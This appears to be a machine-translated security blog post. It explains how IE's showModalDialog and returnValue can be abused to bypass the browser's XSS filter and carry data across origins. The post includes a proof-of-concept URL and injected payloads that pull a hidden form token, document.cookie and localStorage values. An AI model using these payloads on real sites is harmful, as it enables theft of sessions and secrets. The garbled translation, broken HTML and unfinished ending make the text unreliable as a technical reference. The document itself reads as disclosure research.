Use showModalDialog to bypass IE's XSS Filtering

Use showModalDialog to bypass IE's XSS Filtering

Today, I want to share with you an article about Xss filtering that uses showModalDialog to bypass IE.

The showModalDialog function has been in existence for many years. Although it is currently invisible in WEB standards, it has a unique mechanism, I think this article I wrote is worth it. This function supports IE, Firefox, and Safari. Note that this function is not supported in Chrome37!

First, we will summarize the usage of showModalDialog below.

The first parameter is the URL you want to open in the simulation dialog box, and the second parameter is the parameter you want to pass to the simulation dialog box. You can use it through the window. dialogArguments feature in the simulation window.

Parameters are passed through window. dialogArguments. The two windows must be the same source.

However, their returnValue values are different. In Safari and IE, the two windows do not need the same source, but in Firefox, the two windows need the same source.

Here is my test address:
Http://vulnerabledoma.in/showModalDialog/opener.html

Safari can easily pass it to different sources. Please click the "x-origin" button for testing.

To copy data from IE, we need 3xx redirection. Please click "x-origin (redirect)" to test.

Through the returnValue feature in Safari and IE, we can pass the information to another source. This may pose a threat to many Web applications. Of course, I will not advocate the secure use of showModalDialog in 2015.

Attackers can bypass IE Xss filtering.

Available conditions:

1. Xss exists in JS

2. JS contains sensitive information

The following is my test page:
Http://vulnerabledoma.in/xss_token? Q = [XSS_HERE]
Form name = form>
Input type = hidden name = token value = f9d150048b>
Form>
Script> var q = "[XSS_HERE]" script>

Seeing is real, listening is false. Use IE to check the POC below
Http://l0.cm/xssfilter_bypass/showModalDialog.html

If it succeeds, when you close the simulated dialog, you will see the pop-up token string.

Let's take a look at the details. You will redirect
Http://vulnerabledoma.in/xss_token? Q = % 22% 3 BreturnValue = form. token. value //

Inject payload:
Name = form>
Type = hidden name = token value = f9d150048b>
Var q = ""; returnValue = form. token. value //"

Next, the token is passed to returnValue.

It does not need to be repeated. its working principle is as follows:
"; ReturnValue = document. cookie //
"; ReturnValue = localStorage. key //

I tried to access the window object of another page through window. opener)